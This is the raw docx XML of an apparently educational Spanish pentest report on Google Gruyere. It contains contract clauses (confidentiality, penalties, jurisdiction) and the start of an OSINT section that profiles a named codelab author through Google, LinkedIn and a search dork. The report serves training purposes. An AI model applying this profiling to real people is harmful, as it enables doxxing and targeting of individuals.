          </w:pPr>
          <w:r>
            <w:t>Haya sido requerida por la parte receptora mediante una resolución firme por autoridades administrativas o judiciales competentes. En este caso deberá notificarse</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3A7A150D" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="788674C0" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="5939F291" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
          </w:pPr>
          <w:bookmarkStart w:id="18" w:name="_Toc120529622"/>
          <w:bookmarkStart w:id="19" w:name="_Toc128034136"/>
          <w:r>
            <w:t>3.3</w:t>
          </w:r>
          <w:r>
            <w:tab/>
            <w:t>Derechos de propiedad</w:t>
          </w:r>
          <w:bookmarkEnd w:id="18"/>
          <w:bookmarkEnd w:id="19"/>
          <w:r>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1F1B9898" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="00B9B2A0" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:r>
            <w:t>En este acuerdo no supone la concesión expresa o implícita, de derecho alguno sobre la información confidencial que la empresa cliente suministre, salvo el que en cada caso sea otorgado expresamente en relación con el alcance del presente contrato</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6F064876" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t xml:space="preserve">En consecuencia, el suministro de dicha información no podrá entenderse, en ningún caso, como concesión de patente, licencia o cualquier otro derecho de propiedad intelectual o industrial alguno, considerándose que aquella permanecerá en todo momento en el ámbito de propiedad de la empresa cliente o del tercero a quien pertenezca </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5F16DABE" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="0AD2846B" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
          </w:pPr>
          <w:bookmarkStart w:id="20" w:name="_Toc120529623"/>
          <w:bookmarkStart w:id="21" w:name="_Toc128034137"/>
          <w:r>
            <w:t>3.4</w:t>
          </w:r>
          <w:r>
            <w:tab/>
            <w:t>Vigencia</w:t>
          </w:r>
          <w:bookmarkEnd w:id="20"/>
          <w:bookmarkEnd w:id="21"/>
        </w:p>
        <w:p w14:paraId="492EA4BC" w14:textId="40725CDF" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:r>
            <w:t xml:space="preserve">Las obligaciones previstas en la </w:t>
          </w:r>
          <w:r w:rsidR="00817B48">
            <w:t>cláusula</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> 2 permanecerán en vigor hasta que hayan transcurrido tres años contados a partir de la fecha de entrega del informe de resultados del presente contrato</w:t>
          </w:r>
          <w:r w:rsidR="00817B48">
            <w:t>.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1D728C0D" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="4E739AB3" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
          </w:pPr>
          <w:bookmarkStart w:id="22" w:name="_Toc120529624"/>
          <w:bookmarkStart w:id="23" w:name="_Toc128034138"/>
          <w:r>
            <w:t xml:space="preserve">3.5 </w:t>
          </w:r>
          <w:r>
            <w:tab/>
            <w:t>Legislación aplicable</w:t>
          </w:r>
          <w:bookmarkEnd w:id="22"/>
          <w:bookmarkEnd w:id="23"/>
        </w:p>
        <w:p w14:paraId="4402A5E9" w14:textId="02B41F2E" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:r>
            <w:t>Este compromiso se interpretará de conformidad con las leyes españolas, en este caso la ley de protección de datos del 2018.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="531CD976" w14:textId="4556C897" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:r>
            <w:t>La ley aplicable a nivel europeo será el Reglamento General de Protección de Datos (RGPD), de 25 mayo de 2018.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7DE6AEEE" w14:textId="69AF9BFC" w:rsidR="00BE55FE" w:rsidRDefault="00817B48" w:rsidP="00BE55FE">
          <w:r>
            <w:t>Además,</w:t>
          </w:r>
          <w:r w:rsidR="00BE55FE">
            <w:t xml:space="preserve"> la Ley Orgánica 3/2018, de 5 de diciembre, de Protección de Datos Personales y garantía de los derechos digitales, que desarrolla el RGPD y establece las bases legales para la protección de datos personales en territorio español.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0D187766" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="34A3B02A" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="06AA10E8" w14:textId="212F927A" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:r>
            <w:t>Si alguna de las partes es objeto de una fusión u otro tipo de reorganización societaria, se acuerda que este compromiso será vinculante para que el suceda de acuerdo con el lay aplicable</w:t>
          </w:r>
          <w:r w:rsidR="00EF40A8">
            <w:t>.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="455738FF" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE"/>
        <w:p w14:paraId="3E3268A0" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
          </w:pPr>
          <w:bookmarkStart w:id="24" w:name="_Toc120529625"/>
          <w:bookmarkStart w:id="25" w:name="_Toc128034139"/>
          <w:r>
            <w:t>3.6</w:t>
          </w:r>
          <w:r>
            <w:tab/>
            <w:t>CLÁUSULA PENAL</w:t>
          </w:r>
          <w:bookmarkEnd w:id="24"/>
          <w:bookmarkEnd w:id="25"/>
          <w:r>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2EE4A1BC" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:t>Las partes se comprometen a cumplir con todos los términos fijados en el presente contrato, y muy especialmente aquellos relativos a las cláusulas sobre propiedad intelectual e industrial, confidencialidad y obligación de secreto.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="141D7A72" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
          </w:pPr>
          <w:r>
            <w:t>Independientemente de las responsabilidades que pudieran derivarse del incumplimiento del presente acuerdo, así como de las eventuales indemnizaciones por daños y perjuicios de cualquier naturaleza que pudieran establecerse, el incumplimiento de estas obligaciones determinará a elección de la parte que no incumplió el contenido de los términos fijados en el presente contrato:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="49EF3663" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="19"/>
            </w:numPr>
            <w:suppressAutoHyphens/>
            <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="720"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:t>La resolución del contrato.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="79065F09" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE">
          <w:pPr>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="19"/>
            </w:numPr>
            <w:suppressAutoHyphens/>
            <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="720"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">El abono de…………. € en concepto de penalización. </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0478CBC4" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:suppressAutoHyphens/>
            <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
            <w:jc w:val="both"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="292DDC78" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
          </w:pPr>
          <w:bookmarkStart w:id="26" w:name="_Toc120529626"/>
          <w:bookmarkStart w:id="27" w:name="_Toc128034140"/>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>3.7</w:t>
          </w:r>
          <w:r>
            <w:tab/>
            <w:t>CONFIDENCIALIDAD DEL ACUERDO</w:t>
          </w:r>
          <w:bookmarkEnd w:id="26"/>
          <w:bookmarkEnd w:id="27"/>
        </w:p>
        <w:p w14:paraId="5F6FBF42" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:t>Las partes acuerdan que este acuerdo reviste el carácter de confidencial y por tanto se prohíbe su divulgación a terceros.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5D0934BF" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
          </w:pPr>
          <w:bookmarkStart w:id="28" w:name="_Toc120529627"/>
          <w:bookmarkStart w:id="29" w:name="_Toc128034141"/>
          <w:r>
            <w:t>3.8</w:t>
          </w:r>
          <w:r>
            <w:tab/>
            <w:t>MODIFICACIÓN O CANCELACIÓN</w:t>
          </w:r>
          <w:bookmarkEnd w:id="28"/>
          <w:bookmarkEnd w:id="29"/>
        </w:p>
        <w:p w14:paraId="45396132" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
          </w:pPr>
          <w:r>
            <w:t>Este acuerdo sólo podrá ser modificado con el consentimiento expreso de ambas partes, en documento escrito y mencionando la voluntad de las partes de modificar el presente acuerdo.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4552A4E3" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0E8C7D9F" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:pStyle w:val="Ttulo3"/>
          </w:pPr>
          <w:bookmarkStart w:id="30" w:name="_Toc120529628"/>
          <w:bookmarkStart w:id="31" w:name="_Toc128034142"/>
          <w:r>
            <w:t>3.8</w:t>
          </w:r>
          <w:r>
            <w:tab/>
            <w:t>JURISDICCIÓN.</w:t>
          </w:r>
          <w:bookmarkEnd w:id="30"/>
          <w:bookmarkEnd w:id="31"/>
        </w:p>
        <w:p w14:paraId="3EBBF87B" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
          </w:pPr>
          <w:r>
            <w:t>Las partes</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r>
            <w:t>se comprometen a resolver de manera amistosa cualquier desacuerdo que pueda surgir en el desarrollo del presente contrato.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4C38579B" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
          </w:pPr>
          <w:r>
            <w:t>En caso de conflicto ambas partes acuerdan el sometimiento a los Tribunales de……….., con renuncia de su propio fuero.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2885B5BE" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRDefault="00BE55FE" w:rsidP="00BE55FE">
          <w:pPr>
            <w:spacing w:before="240" w:after="240"/>
          </w:pPr>
          <w:r>
            <w:t>Y en prueba de conformidad de cuanto antecede, firman el presente acuerdo por duplicado y a un solo efecto en el lugar y fecha citados.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="08EA0860" w14:textId="77777777" w:rsidR="00BE55FE" w:rsidRPr="00D32284" w:rsidRDefault="00BE55FE" w:rsidP="00D210C7"/>
        <w:p w14:paraId="67C04D43" w14:textId="77777777" w:rsidR="00D32284" w:rsidRPr="00D32284" w:rsidRDefault="00D32284" w:rsidP="00D32284"/>
        <w:p w14:paraId="46012D33" w14:textId="59CE5E3A" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00D210C7"/>
        <w:p w14:paraId="5D01C031" w14:textId="5646A184" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="6EAF1B31" w14:textId="16AF2394" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="57F4917F" w14:textId="5F2A728F" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="7A79D41A" w14:textId="1D912A8F" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="651A6286" w14:textId="54A1924B" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="55763D42" w14:textId="708CDD44" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="67117E66" w14:textId="0F231331" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="4FA3F785" w14:textId="650B5D2E" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="00028F7F" w14:textId="02F04CB7" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="57BBA900" w14:textId="5FA58461" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="6BD478CB" w14:textId="56FB8A3C" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="0AF3063A" w14:textId="6F6115D9" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="7A9007C3" w14:textId="57FAB99F" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="31D5003B" w14:textId="77777777" w:rsidR="00D210C7" w:rsidRPr="00406981" w:rsidRDefault="00D210C7" w:rsidP="00D210C7"/>
        <w:p w14:paraId="70AECE9F" w14:textId="77777777" w:rsidR="00E341B1" w:rsidRDefault="00C824E5" w:rsidP="00C824E5">
          <w:pPr>
            <w:pStyle w:val="Ttulo1"/>
          </w:pPr>
          <w:bookmarkStart w:id="32" w:name="_Toc128034143"/>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>Recopilación de información (OSINT)</w:t>
          </w:r>
          <w:bookmarkEnd w:id="32"/>
        </w:p>
        <w:p w14:paraId="6ABBC1B5" w14:textId="77777777" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="360"/>
          </w:pPr>
          <w:r>
            <w:t>Para esta parte buscaré usuarios relacionados con la aplicación web de Google Gruyere:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="27E6C03E" w14:textId="54D0058A" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="360"/>
          </w:pPr>
          <w:r>
            <w:t>Analizando la versión web de Google Gruyere, encontramos esto -&gt;</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4B7169FB" w14:textId="77777777" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="360"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1971A9DD" w14:textId="58FB9CC5" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="360"/>
          </w:pPr>
          <w:r w:rsidRPr="00E341B1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="597F357B" wp14:editId="5CE192F7">
                <wp:extent cx="5400040" cy="5248275"/>
                <wp:effectExtent l="0" t="0" r="0"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248275"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="47BA228F" w14:textId="3B3BEAB7" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="360"/>
          </w:pPr>
          <w:r>
            <w:t>Son las tres personas que hicieron este codelab.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="04A83D9C" w14:textId="26995498" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="360"/>
          </w:pPr>
          <w:r>
            <w:t>Pasaré a analizar cada una de estos nombre:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="634F23DB" w14:textId="6E1F8430" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="360"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="4A1F1A66" w14:textId="1949908A" w:rsidR="00E341B1" w:rsidRDefault="00E341B1">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="24"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="33" w:name="_Toc128034144"/>
          <w:r>
            <w:t>Bruce Leban -&gt;</w:t>
          </w:r>
          <w:bookmarkEnd w:id="33"/>
        </w:p>
        <w:p w14:paraId="363AC2D8" w14:textId="0751A19A" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="61B14F36" w14:textId="047F617F" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Si buscamos en Google, su nombre encontraremos esto:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="25CBF432" w14:textId="1C63D857" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3D6F4198" w14:textId="1382F627" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00E341B1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61456B86" wp14:editId="7E440BBB">
                <wp:extent cx="5400040" cy="524256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242560"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="2229FB54" w14:textId="3F9B9218" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="4E406E9F" w14:textId="70EEB9C4" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Ahora procederemos a ver su perfil de </w:t>
          </w:r>
          <w:r w:rsidR="000F5FC2">
            <w:t>LinkedIn</w:t>
          </w:r>
          <w:r>
            <w:t>:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="37EEE658" w14:textId="18FC2049" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00E341B1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419DA2B9" wp14:editId="0009F4AC">
                <wp:extent cx="5400040" cy="524256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242560"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="1B6F5409" w14:textId="688725DA" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Encontramos un usuario y dos enlaces a páginas.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="23C3FD87" w14:textId="31C17E8D" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>El primer enlace:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6720A8DC" w14:textId="6AFADE41" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="352D57C1" w14:textId="16C3C913" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00E341B1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D853D99" wp14:editId="7163A527">
                <wp:extent cx="5400040" cy="5275580"/>
                <wp:effectExtent l="0" t="0" r="0" b="127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275580"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="700593C6" w14:textId="6C389FB7" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Vemos que hay una referencia a Google Grueyre.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="17724FF6" w14:textId="2929EFB7" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Segunda página:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="48DDFC9F" w14:textId="0BD76DB2" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00E341B1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51C877A2" wp14:editId="27E80A14">
                <wp:extent cx="5400040" cy="524764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247640"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="629803A1" w14:textId="53541E86" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>El codelab de Google Gruyere.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5D23DC03" w14:textId="43BC370E" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2698F75E" w14:textId="36D8C23E" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Con estas dos páginas podemos identificar que es la persona correcta.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="34A0A329" w14:textId="11A01F2F" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="46D905E5" w14:textId="5F52185C" w:rsidR="00E341B1" w:rsidRDefault="00E341B1" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Ahora voy a buscar páginas en onde este registrado ese usuario:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6D08A879" w14:textId="5A17D797" w:rsidR="00E341B1" w:rsidRDefault="00E341B1">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Primero usando Google docs.-&gt;</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4117B8F9" w14:textId="2BE5236A" w:rsidR="00E341B1" w:rsidRDefault="000714B5" w:rsidP="00E341B1">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Usaré este dork </w:t>
          </w:r>
          <w:r w:rsidRPr="008353EE">
            <w:rPr>
              <w:color w:val="44546A" w:themeColor="text2"/>
            </w:rPr>
            <w:t>‘bruceleban*.com’</w:t>
          </w:r>
          <w:r>
            <w:t>:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="108C60C5" w14:textId="5D400E18" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="00E341B1">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>Encontramos este perfil:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7D69955E" w14:textId="53909369" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="00E341B1">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="000714B5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="647E6DCF" wp14:editId="3C383686">
                <wp:extent cx="5400040" cy="528193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281930"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
